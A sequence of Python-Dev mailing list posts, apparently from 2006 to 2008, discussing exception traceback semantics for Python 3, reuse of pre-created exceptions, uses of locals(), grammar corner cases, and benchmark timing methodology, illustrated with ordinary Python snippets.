ParseException( instring, loc, self.errmsg ) exc = self.myException exc.loc = loc exc.pstr = instring raise exc The "Literal" and other token classes are part of the grammar definition and usually exist in module scope. There's another question I came up with. If the exception already has a __traceback__, will that traceback be overwritten if the instance is reraised? Consider this code, loosly derived from os._execvpe import os, sys _PATH = ["here", "there", "elsewhere"] def open_file_on_path(name): # If nothing exists, raises an exception based on the # first attempt saved_err = None saved_tb = None for dirname in _PATH: try: return open(os.path.join(dirname, name)) except Exception, err: if not saved_err: saved_err = err saved_tb = sys.exc_info()[2] raise saved_err.__class__, saved_err, saved_tb open_file_on_path("spam") which generates this Traceback (most recent call last): File "raise.py", line 19, in open_file_on_path("spam") File "raise.py", line 11, in open_file_on_path return open(os.path.join(dirname, name)) IOError: [Errno 2] No such file or directory: 'here/spam' What is the correct way to rewrite this for use with "with_traceback"? Is it def open_file_on_path(name): # If nothing exists, raises an exception based on the # first attempt saved_err = None for dirname in _PATH: try: return open(os.path.join(dirname, name)) except Exception, err: if not saved_err: saved_err = err saved_tb = sys.exc_info()[2] raise saved_err.with_traceback(saved_err.__traceback__) One alternative, btw, is raise saved_err.with_traceback() to have it use the existing __traceback__ (and raising its own exception if __traceback__ is None?) Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] with_traceback
PJE: > Then don't do that, as it's bad style for Python 3.x. ;-) It's bad style for 3.x only if Python goes with this interface. If it stays with the 2.x style then there's no problem. There may also be solutions which are cleaner and which don't mutate the exception instance. I am not proposing such a syntax. I have ideas I am not a language designer and have long given up the idea that I might be good at it. > This does mean you won't be able to port your code to 3.x style until > you've gotten rid of shared exception instances from all your dependencies, > but 3.x porting requires all your dependencies to be ported anyway. What can be done to minimize the number of dependencies which need to be changed? > It should be sufficient in both 2.x and 3.x for with_traceback() to raise > an error if the exception already has a traceback -- this should catch any > exception instance reuse. That would cause a problem in my example where I save then reraise the exception, as raise saved_err.with_traceback(saved_err.__traceback__) > >What is the correct way to rewrite this for use > >with "with_traceback"? Is it [...] > No, it's more like this: > > try: > for dirname in ... > try: > return ... > except Exception as err: > saved_err = err > raise saved_err > finally: > del saved_err I don't get it. The "saved_err" has a __traceback__ attached to it, and is reraised. Hence it gets the old stack, right? Suppose I wrote ERR = Exception("Do not do that") try: f(x) except Exception: raise ERR try: f(x*2) except Exception: raise ERR Yes it's bad style, but people will write it. The ERR gets the traceback from the first time there's an error, and that traceback is locked in ... since raise won't change the __traceback__ if one exists. (Based on what you said it does.) > I've added the outer try-finally block to minimize the GC impact of the > *original* code you showed, as the `saved_tb` would otherwise have created > a cycle. That is, the addition is not because of the porting, it's just > something that you should've had to start with. Like I said, I used code based on os._execvpe. Here's the code saved_exc = None saved_tb = None for dir in PATH: fullname = path.join(dir, file) try: func(fullname, *argrest) except error, e: tb = sys.exc_info()[2] if (e.errno != ENOENT and e.errno != ENOTDIR and saved_exc is None): saved_exc = e saved_tb = tb if saved_exc: raise error, saved_exc, saved_tb raise error, e, tb I see similar use in atexit._run_exitfuncs, though as Python is about to exit it won't make a real difference. doctest shows code like >>> exc_info = failure.exc_info >>> raise exc_info[0], exc_info[1], exc_info[2] SimpleXMLRPCServer does things like except: # report exception back to server exc_type, exc_value, exc_tb = sys.exc_info() response = xmlrpclib.dumps( xmlrpclib.Fault(1, "%s:%s" % (exc_type, exc_value)), encoding=self.encoding, allow_none=self.allow_none, ) I see threading.py gets it correctly. My point here is that most Python code which uses the traceback term doesn't break the cycle, so must be caught by the gc. While there might be a more correct way to do it, it's too complicated for most to get it right. > Anyway, the point here is that in 3.x style, most uses of 3-argument raise > just disappear altogether. If you hold on to an exception instance, you > have to be careful about it for GC, but no more so than in current Python. Where people already make a lot of mistakes. But my concern is not in the gc, it's in the mutability of the exception causing hard to track down problems in code which is written by beginning to intermediate users. > The "save one instance and use it forever" use case is new to me - I've > never seen nor written code that uses it before now. It's definitely > incompatible with 3.x style, though. I pointed out an example in pyparsing. Thomas W. says he's seen other code. I've been looking for another real example but as this is relatively uncommon code, I don't have a wide enough corpus for the search. I also don't know of a good tool for searching for this sort of thing. (Eg, www.koders.com doesn't help.) It's a low probability occurance. So is the use of the 3 arg raise. Hence it's hard to get good intuition about problems which might arise. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] with_traceback
Glyph: > This seems like kind of a strange micro-optimization to have an impact > on a language change discussion. Just as a reminder, my concern is that people reuse exceptions (rarely) and that the behavior of the "with_exceptions()" method is ambiguous when that happens. It has nothing to do with optimization. The two solutions of: 1. always replace an existing __traceback__ 2. never replace an existing __traceback__ both seem to lead to problems. Here are minimal examples for thought: # I know PJE says this is bad style for 3.0. Will P3K help # identify this problem? If it's allowable, what will it do? # (Remember, I found existing code which reuses exceptions # so this isn't purely theoretical, only rare.) BAD = Exception("that was bad") try: raise BAD except Exception: pass raise BAD # what traceback will be shown here? (Oh, and what would a debugger report?) # 2nd example; reraise an existing exception instance. # It appears that any solution which reports a problem # for #1 will not allow one or both of the following. try: raise Exception("bad") except Exception as err: first_err = err try: raise Exception("bad") except Exception: raise first_err # what traceback will be shown here? # 3rd example, like the 2nd but end it with raise first_err.with_exception(first_err.__traceback__) # what traceback will be shown here? > I'm sorry if this has been proposed already in this discussion (I > searched around but did not find it), I saw references to a PEP about it but could not find the PEP. Nor could I find much discussion either. I would like to know the details. I assume that "raise" adds the __traceback__ if it's not None, hence there's no way it can tell if the __traceback__ on the instance was created with "with_traceback()" from an earlier "raise" or from the with_traceback. But in the current examples it appears that the Exception class could attach a traceback during instantiation and "with_traceback" simply replaces that. I doubt this version, but cannot be definitive. While variant method/syntax may improve matters, I think people will write code as above -- all of which are valid Python 2.x and 3.x -- and end up with strange and hard to interpret tracebacks. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] with_traceback
On 2/28/07, James Y Knight <[EMAIL PROTECTED]> wrote: > It seems to me that a stack trace should always be attached to an > exception object at creation time of the exception, and never at any > other time. Then, if someone pre-creates an exception object, they > get consistent and easily explainable behavior (the traceback to the > creation point). The traceback won't necessarily be *useful*, but > presumably someone pre-creating an exception object did so to save > run-time, and creating the traceback is generally very expensive, so > doing that only once, too, seems like a win to me. The only example I found in about 2 dozen packages where the exception was precreated was in pyparsing. I don't know the reason why it was done that way, but I'm certain it wasn't for performance. The exception is created as part of the format definition. In that case if the traceback is important then it's important to know which code was attempting the parse. The format definition was probably certainly done at module import time. In any case, reraising the same exception instance is a rare construct in current Python code. PJE had never seen it before. It's hard to get a good intuition from zero data points. :) ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] with_traceback
On 3/1/07, Guido van Rossum <[EMAIL PROTECTED]> wrote: > Since by far the most common use case is to create the > exception in the raise statement, the behavior there won't be any > different than it is today; the traceback on precreated objects will > be useless, but folks who precreate them for performance reasons > presumably won't care; and those that create global exception > instances by mistakenly copying the wrong idiom, well, they'll learn > quickly (and a lot more quickly than when we try to override the > exception). Here's a few more examples of code which don't follow the idiom raise ExceptionClass(args) Zope's ZConfig/cmdline.py def addOption(self, spec, pos=None): if pos is None: pos = "", -1, -1 if "=" not in spec: e = ZConfig.ConfigurationSyntaxError( "invalid configuration specifier", *pos) e.specifier = spec raise e The current xml.sax.handler.Error handler includes def error(self, exception): "Handle a recoverable error." raise exception def fatalError(self, exception): "Handle a non-recoverable error." raise exception and is used like this in xml.sax.expatreader.ExpatParser.feed try: # The isFinal parameter is internal to the expat reader. # If it is set to true, expat will check validity of the entire # document. When feeding chunks, they are not normally final - # except when invoked from close. self._parser.Parse(data, isFinal) except expat.error, e: exc = SAXParseException(expat.ErrorString(e.code), e, self) # FIXME: when to invoke error()? self._err_handler.fatalError(exc) Note that the handler may decide to ignore the exception, based on which error occured. The traceback should show where in the handler the exception was raised, and not the point at which the exception was created. ZODB/Connection.py: ... if isinstance(store_return, str): assert oid is not None self._handle_one_serial(oid, store_return, change) else: for oid, serial in store_return: self._handle_one_serial(oid, serial, change) def _handle_one_serial(self, oid, serial, change): if not isinstance(serial, str): raise serial ... Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Another traceback idea [was: except Exception as err, tb]
On 3/2/07, Greg Ewing <[EMAIL PROTECTED]> wrote: > This has given me another idea: ... > Now, I'm not proposing that the raise statement should > actually have the above syntax -- that really would be > a step backwards. Instead it would be required to have > one of the following forms: > > raise ExceptionClass > > or > > raise ExceptionClass(args) > > plus optional 'with traceback' clauses in both cases. > However, the apparent instantiation call wouldn't be > made -- it's just part of the syntax. Elsewhere here I listed several examples of existing code which raises an instance which was caught or created earlier. That would not be supported if the raise had to be written in your given forms. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PEP 344 (was: with_traceback)
On 3/2/07, Guido van Rossum <[EMAIL PROTECTED]> wrote: > So, despite the existence of libraries that pre-create exceptions, how > bad would it really be if we declared that use unsafe? It wouldn't be > hard to add some kind of boobytrap that goes off when pre-created > exceptions are raised multiple times. If this had always been the > semantics I'm sure nobody would have complained and I doubt that it > would have been a common pitfall either (since if it doesn't work, > there's no bad code abusing it, and so there are no bad examples that > newbies could unwittingly emulate). Here's code from os._execvpe which reraises an exception instance which was created earlier saved_exc = None saved_tb = None for dir in PATH: fullname = path.join(dir, file) try: func(fullname, *argrest) except error, e: tb = sys.exc_info()[2] if (e.errno != ENOENT and e.errno != ENOTDIR and saved_exc is None): saved_exc = e saved_tb = tb if saved_exc: raise error, saved_exc, saved_tb raise error, e, tb Would the boobytrap go off in this case? I think it would, because a "saved_exc" is raised twice. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Performance of pre-creating exceptions?
On 3/2/07, Adam Olsen <[EMAIL PROTECTED]> wrote: > We can get more than half of the benefit simply by using a default > __init__ rather than a python one. If you need custom attributes but > they're predefined you could subclass the exception and have them as > class attributes. Given that, is there really a need to pre-create > exceptions? The only real world example of (re)using pre-computed exceptions I found was in pyparsing. Here are two examples: def parseImpl( self, instring, loc, doActions=True ): if (instring[loc] == self.firstMatchChar and (self.matchLen==1 or instring.startswith(self.match,loc)) ): return loc+self.matchLen, self.match #~ raise ParseException( instring, loc, self.errmsg ) exc = self.myException exc.loc = loc exc.pstr = instring raise exc (The Token's constructor is class Token(ParserElement): def __init__( self ): super(Token,self).__init__( savelist=False ) self.myException = ParseException("",0,"",self) and the exception class uses __slots__ thusly: class ParseBaseException(Exception): """base exception class for all parsing runtime exceptions""" __slots__ = ( "loc","msg","pstr","parserElement" ) # Performance tuning: we construct a *lot* of these, so keep this # constructor as small and fast as possible def __init__( self, pstr, loc, msg, elem=None ): self.loc = loc self.msg = msg self.pstr = pstr self.parserElement = elem so you can see that each raised exception modifies 2 of the 4 instance variables in a ParseException.) -and- # this method gets repeatedly called during backtracking with the same arguments - # we can cache these arguments and save ourselves the trouble of re-parsing # the contained expression def _parseCache( self, instring, loc, doActions=True, callPreParse=True ): lookup = (self,instring,loc,callPreParse) if lookup in ParserElement._exprArgCache: value = ParserElement._exprArgCache[ lookup ] if isinstance(value,Exception): if isinstance(value,ParseBaseException): value.loc = loc raise value return value else: try: ParserElement._exprArgCache[ lookup ] = \ value = self._parseNoCache( instring, loc, doActions, callPreParse ) return value except ParseBaseException, pe: ParserElement._exprArgCache[ lookup ] = pe raise The first definitely has the look of a change for better performance. I have not asked the author nor researched to learn how much gain there was with this code. Because the saved exception is tweaked each time (hence not thread-safe), your timing tests aren't directly relevant as your solution of creating the exception using the default constructor then tweaking the instance attributes directly would end up doing 4 setattrs instead of 2. % python -m timeit -r 10 -n 100 -s 'e = Exception()' 'try: raise e' 'except: pass' 100 loops, best of 10: 1.55 usec per loop % python -m timeit -r 10 -n 100 -s 'e = Exception()' 'try: e.x=1;e.y=2;raise e' 'except: pass' 100 loops, best of 10: 1.98 usec per loop so 4 attributes should be about 2.5usec, or 25% slower than 2 attributes. There's also a timing difference between looking for the exception class name in module scope vs. using self.myException I've tried to find other examples but couldn't in the 20 or so packages I have on my laptop. I used searches like # find module variables assigned to exception instances egrep "^[a-z].*=.*Error\(" *.py egrep "^[a-z].*=.*Exception\(" *.py # find likely instances being raised grep "^ *raise [a-z]" *.py # find likely cases of 3-arg raises grep "^ *raise .*,.*," *.py to find candidates. Nearly all false positives. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] locals(), closures, and IronPython...
On 3/5/07, Guido van Rossum <[EMAIL PROTECTED]> wrote: > I don't know too many good use cases for > locals() apart from "learning about the implementation" I think this > might be okay. Since I'm watching this list for any discussion on the traceback threads, I figured I would point out the most common use I know for locals() is in string interpolation when there are many local variables, eg: a = "spam" b = "egg" ... y = "foo" z = "bar" print fmtstr % locals() The next most is to deal with a large number of input parameters, as this from decimal.py: def __init__(self, prec=None, rounding=None, traps=None, flags=None, _rounding_decision=None, Emin=None, Emax=None, capitals=None, _clamp=0, _ignored_flags=None): ... for name, val in locals().items(): if val is None: setattr(self, name, _copy.copy(getattr(DefaultContext, name))) else: setattr(self, name, val) and this example based on a post of Alex Martelli's: def __init__(self, fee, fie, foo, fum): self.__dict__.update(locals()) del self.self In both cases they are shortcuts to "reduce boilerplate". I've more often used the first form in my code. If an inner local returned a superset of the items it returns now, I would not be concerned. I've rarely used the 2nd form in my code. The only way I can see there being a problem is if a function defines a class, which then uses the locals() trick, because >>> def blah(): ...a = 6; b = 7 ...class XYZ(object): ... def __init__(self): ...c = a ...print "in the class", locals() ...print "in the function", locals() ...XYZ() ... >>> blah() in the function {'a': 6, 'XYZ': , 'b': 7} in the class {'a': 6, 'c': 6, 'self': <__main__.XYZ object at 0x72ad0>} the code in the class's initializer will have more locals. I've never seen code like this (class defined in a function, with __init__ using locals()) and it's not something someone would write thinking it was a standard way of doing things. In both cases I'm not that bothered if it's implementation specific. Using locals has the feel of being too much like a trick to get around having to type so much. That's what editor macros are for :) Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] locals(), closures, and IronPython...
On 3/6/07, Mike Klaas <[EMAIL PROTECTED]> wrote: > There's nothing quite like running help(func) and getting *args, > **kwargs as the documented parameter list. I think >>> import resource >>> help(resource.getpagesize) Help on built-in function getpagesize in module resource: getpagesize(...) is pretty close. :) Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
[Python-Dev] small Grammar questions
I'm finishing up a PLY lexer and parser for the current CVS version of the Python grammar. As part of it I've been testing a lot of dark corners in the grammar definition and implementation. Python 2.5 has some small and rare problems which I'm pleased to note have been pretty much fixed in Python 2.6. I have two questions about the grammar definition. Here's a difference between 2.5 and 2.6. % cat x.py c = "This is 'c'" def spam((a) = c): print a spam() % python2.5 x.py This is 'c' % python2.6 x.py File "x.py", line 2 def spam((a) = c): SyntaxError: non-default argument follows default argument I don't understand why that's changed. This shouldn't be a SyntaxError and there is no non-default argument following the default argument. Note that this is still valid >>> def spam((a,) = c): ... pass ... I think 2.6 is incorrect. According to the documentation at http://docs.python.org/ref/function.html defparameter::= parameter ["=" expression] sublist ::= parameter ("," parameter)* [","] parameter ::= identifier | "(" sublist ")" funcname::= identifier Second question is about trailing commas in list comprehension. I don't understand why the commented out line is not allowed. [x for x in 1] #[x for x in 1,] # This isn't legal [x for x in 1,2] [x for x in 1,2,] [x for x in 1,2,3] The Grammar file says # Backward compatibility cruft to support: # [ x for x in lambda: True, lambda: False if x() ] # even while also allowing: # lambda x: 5 if x else 2 # (But not a mix of the two) testlist_safe: old_test [(',' old_test)+ [',']] but if I change it to also allow testlist_safe : old_test ',' then PLY still doesn't report any ambiguities in the grammar and I can't find an expression that exhibits a problem. Could someone here enlighten me? Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] small Grammar questions
On Feb 19, 2008 1:38 PM, Andrew Dalke <[EMAIL PROTECTED]> wrote: > def spam((a) = c): > print a On Feb 20, 2008 12:29 AM, Brett Cannon <[EMAIL PROTECTED]> wrote: > The error might be odd, but I don't see why that should be allowed > syntax. Having a parameter surrounded by a parentheses like that makes > no sense in a context of a place where arbitrary expressions are not > allowed. I'm fine with that. This is a corner that no one but language lawyers will care about. The thing is, the online documentation and the Grammar file allow it, as did Python 2.5. In any case, the error message is not helpful. > From what I can tell the grammar does not prevent it. But it is > possible that during AST creation or bytecode compilation a specific > check is made that is throwing the exception... In my code it's during AST generation... Your pointer to ast.c:672 was helpful. It's stuff jeremy.hylton did in r54415. Now I have to figure out how Python's internal ASTs work.. Which might take a while. > Are you asking why the decision was made to make the expression > illegal, or why the grammar is flagging it is wrong? Why it's illegal. Supporting a comma doesn't seem to make anything ambiguous, but PLY's LALR(1) might handle things that Python itself doesn't and I don't have the experience to tell. There are other places where the grammar definition allows syntax that is rejected later on. Those I can justify by saying it's easier to define the grammar that way (hence f(1+1=2) is legal grammar but illegal Python), or to produce better error messages (like "from .a import *"). But this one prohibiting [x for x in 1,] I can't figure out. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] small Grammar questions
Okay, my conclusion is def f((a)=5) is wrong, and the code should be changed to report a better error message. I'll file a bug against that. and I'm going with Brett suggestion that [x for x in 1,] is not supported because it's almost certainly a programming error. I think therefore the comment in the Grammar file is distracting. As comments can be. On Feb 20, 2008 3:08 AM, Steve Holden <[EMAIL PROTECTED]> wrote: > The one that surprised me was the legality of > > def eggs((a, )=c): > pass > > That just seems like unpacking-abuse to me. Yep. Here's another abuse, since I can't figure when someone needs a destructuring del statement. >>> class X(object): pass ... >>> X.a = 123 >>> X.b = "hello" >>> X.c = 9.801 >>> X.a, X.b, X.c (123, 'hello', 9.8012) >>> del (X.a, (X.b, (X.c,))) >>> X.a, X.b, X.c Traceback (most recent call last): File "", line 1, in AttributeError: type object 'X' has no attribute 'a' >>> Is this going to be possible in Python3k? > You really *have* been poking around in little-known crevices, haven't you? Like this bug from 2.5, fixed in 2.6 >>> from __future__ import with_statement >>> with f(x=5, 6): ... pass ... ValueError: field context_expr is required for With :) Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
[Python-Dev] PySequence_Fast_GET_ITEM in string join
The Sourceforge tracker is kaputt so I'm sending it here, in part because the effbot says it's interesting. I can derive from list and override __getitem__ >>> class Spam(list): ... def __getitem__(self, i): ... print i ... return 2 ... >>> Spam()[1] 1 2 >>> Spam()[9] 9 2 >>> Now consider the following >>> class Spam(list): ... def __getitem__(self, i): ... print "Asking for", i ... if i == 0: return "zero" ... if i == 1: return "one" ... raise IndexError, i ... >>> Spam()[1] Asking for 1 'one' >>> Spiffy! For my next trick >>> "".join(Spam()) '' >>> The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, i), which likely doesn't know about my derived __getitem__. p = PyString_AS_STRING(res); for (i = 0; i < seqlen; ++i) { size_t n; item = PySequence_Fast_GET_ITEM(seq, i); n = PyString_GET_SIZE(item); memcpy(p, PyString_AS_STRING(item), n); p += n; if (i < seqlen - 1) { memcpy(p, sep, seplen); p += seplen; } } The Unicode join has the same problem >>> class Spam(list): ... def __getitem__(self, i): ... print "Asking for", i ... if i == 0: return "zero" ... if i == 1: return u"one" ... raise IndexError, i ... >>> "".join(Spam()) '' While if my class is not derived from list, everything is copacetic. >>> class Spam: ... def __getitem__(self, i): ... print "Asking for", i ... if i == 0: return "zero" ... if i == 1: return u"one" ... raise IndexError, i ... >>> "".join(Spam()) Asking for 0 Asking for 1 Asking for 2 u'zeroone' >>> Ditto for deriving from object. >>> class Spam(object): ... def __getitem__(self, i): ... print "Asking for", i ... if i == 0: return "zero" ... if i == 1: return "one" ... raise IndexError, i ... >>> "".join(Spam()) Asking for 0 Asking for 1 Asking for 2 'zeroone' >>> Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PySequence_Fast_GET_ITEM in string join
Me [Andrew Dalke] said: > The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, > i), > which likely doesn't know about my derived __getitem__. Oops, I didn't know what the code was doing well enough. The relevant problem is seq = PySequence_Fast(orig, ""); That calls __iter__ on my derived list object, which knows nothing about my overridden __getitem__ So things are working as designed. Well, back to blundering about. Too much brennivin. ;) Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python Benchmarks
M.-A. Lemburg: The approach pybench is using is as follows: ... The calibration step is run multiple times and is used to calculate an average test overhead time. One of the changes that occured during the sprint was to change this algorithm to use the best time rather than the average. Using the average assumes a Gaussian distribution. Timing results are not. There is an absolute best but that's rarely reached due to background noise. It's more like a gamma distribution plus the minimum time. To show the distribution is non-Gaussian I ran the following def compute(): x = 0 for i in range(1000): for j in range(1000): x += 1 def bench(): t1 = time.time() compute() t2 = time.time() return t2-t1 times = [] for i in range(1000): times.append(bench()) print times The full distribution is attached as 'plot1.png' and the close up (range 0.45-0.65) as 'plot2.png'. Not a clean gamma function, but that's a closer match than an exponential. The gamma distribution looks more like a exponential function when the shape parameter is large. This corresponds to a large amount of noise in the system, so the run time is not close to the best time. This means the average approach works better when there is a lot of random background activity, which is not the usual case when I try to benchmark. When averaging a gamma distribution you'll end up with a bit of a skew, and I think the skew depends on the number of samples, reaching a limit point. Using the minimum time should be more precise because there is a definite lower bound and the machine should be stable. In my test above the first few results are 0.472838878632 0.473038911819 0.473326921463 0.473494052887 0.473829984665 I'm pretty certain the best time is 0.4725, or very close to that. But the average time is 0.58330151391 because of the long tail. Here are the last 6 results in my population of 1000 1.76353311539 1.79937505722 1.82750201225 2.01710510254 2.44861507416 2.90868496895 Granted, I hit a couple of web pages while doing this and my spam filter processed my mailbox in the background... There's probably some Markov modeling which would look at the number and distribution of samples so far and assuming a gamma distribution determine how many more samples are needed to get a good estimate of the absolute minumum time. But min(large enough samples) should work fine. If the whole suite runs in 50 seconds, the per-test run-times are far too small to be accurate. I usually adjust the warp factor so that each *round* takes 50 seconds. The stringbench.py I wrote uses the timeit algorithm which dynamically adjusts the test to run between 0.2 and 2 seconds. That's why the timers being used by pybench will become a parameter that you can then select to adapt pybench it to the OS your running pybench on. Wasn't that decision a consequence of the problems found during the sprint? Andrew [EMAIL PROTECTED] plot1.png Description: PNG image plot2.png Description: PNG image ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python Benchmarks
On 6/2/06, Terry Reedy <[EMAIL PROTECTED]> wrote: > Hardly a setting in which to run comparison tests, seems to me. The point though was to show that the time distribution is non-Gaussian, so intuition based on that doesn't help. > > Using the minimum looks like the way to go for calibration. > > Or possibly the median. Why? I can't think of why that's more useful than the minimum time. Given an large number of samples the difference between the minimum and the median/average/whatever is mostly providing information about the background noise, which is pretty irrelevent to most benchmarks. > But even better, the way to go to run comparison timings is to use a system > with as little other stuff going on as possible. For Windows, this means > rebooting in safe mode, waiting until the system is quiescent, and then run > the timing test with *nothing* else active that can be avoided. A reason I program in Python is because I want to get work done and not deal with stoic purity. I'm not going to waste all that time (or money to buy a new machine) just to run a benchmark. Just how much more accurate would that be over the numbers we get now. Have you tried it? What additional sensitivity did you get and was the extra effort worthwhile? > Even then, I would look at the distribution of times for a given test to > check for anomalously high values that should be tossed. (This can be > automated somewhat.) I say it can be automated completely. Toss all but the lowest. It's the one with the least noise overhead. I think fitting the smaller data points to a gamma distribution might yield better (more reproducible and useful) numbers but I know my stats ability is woefully decayed so I'm not going to try. My observation is that the shape factor is usually small so in a few dozen to a hundred samples there's a decent chance of getting a time with minimal noise overhead. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python Benchmarks
On 6/2/06, M.-A. Lemburg <[EMAIL PROTECTED]> wrote: > It's interesting that even pressing a key on your keyboard > will cause forced context switches. When niceness was first added to multiprocessing OSes people found their CPU intensive jobs would go faster by pressing enter a lot. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python Benchmarks
Tim: > A lot of things get mixed up here ;-) The _mean_ is actually useful > if you're using a poor-resolution timer with a fast test. In which case discrete probability distributions are better than my assumption of a continuous distribution. I looked at the distribution of times for 1,000 repeats of t1 = time.time() t2 = time.time() times.append(t2-t1) The times and counts I found were 9.53674316406e-07 388 1.19209289551e-06 95 1.90734863281e-06 312 2.14576721191e-06 201 2.86102294922e-06 2 1.90734863281e-05 1 3.00407409668e-05 1 This implies my Mac's time.time() has a resolution of 2.384185791015e-07 s (0.2µs or about 4.2MHz.) Or possibily a small integer fraction thereof. The timer overhead takes between 4 and 9 ticks. Ignoring the outliers, assuming I have the CPU all to my benchmark for the timeslice then I expect about +/- 3 ticks of noise per test. To measure 1% speedup reliably I'll need to run, what, 300-600 ticks? That's a millisecond, and with a time quantum of 10 ms there's a 1 in 10 chance that I'll incur that overhead. In other words, I don't think my high-resolution timer is high enough. Got a spare Cray I can use, and will you pay for the power bill? Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python Benchmarks
On 6/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > - I would average the timings of runs instead of taking the minimum value as > sometimes bench marks could be running code that is not deterministic in its > calculations (could be using random numbers that effect convergence). I would rewrite those to be deterministic. Any benchmarks of mine which use random numbers initializes the generator with a fixed seed and does it in such a way that the order or choice of subbenchmarks does not affect the individual results. Any other way is madness. > - Before calculating the average number I would throw out samples > outside 3 sigmas (the outliers). As I've insisted, talking about sigmas assumes a Gaussian distribution. It's more likely that the timing variations (at least in stringbench) are closer to a gamma distribution. > Here is a passage I found ... ... > Unfortunately, defining an outlier is subjective (as it should be), and the > decisions concerning how to identify them must be made on an individual > basis (taking into account specific experimental paradigms The experimental paradigm I've been using is: - precise and accurate clock on timescales much smaller than the benchmark (hence continuous distributions) - rare, random, short and uncorrelated interruptions This leads to a gamma distribution (plus constant offset for minimum compute time) Gamma distributions have longer tails than Gaussians and hence more "outliers". If you think that averaging is useful then throwing those outliers away will artificially lower the average value. To me, using the minimum time, given the paradigm, makes sense. How fast is the fastest runner in the world? Do you have him run a dozen times and get the average, or use the shortest time? > I usually use this approach while reviewing data obtained by fairly > accurate sensors so being being conservative using 3 sigmas works > well for these cases. That uses a different underlying physical process which is better modeled by Gaussians. Consider this. For a given benchmark there is an absolute minimum time for it to run on a given machine. Suppose this is 10 seconds and the benchmark timing comes out 10.2 seconds. The +0.2 comes from background overhead, though you don't know exactly what's due to overhead and what's real. If the times were Gaussian then there's as much chance of getting benchmark times of 10.5 seconds as of 9.9 seconds. But repeat the benchmark as many times as you want and you'll never see 9.9 seconds, though you will see 10.5. > - Another improvement to bench marks can be obtained when both > the old and new code is available to be benched mark together. That's what stringbench does, comparing unicode and 8-bit strings. However, how do you benchmark changes which are more complicated than that? For example, benchmark changes to the exception mechanism, or builds under gcc 3.x and 4.x. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PEP 328 and PEP 338, redux
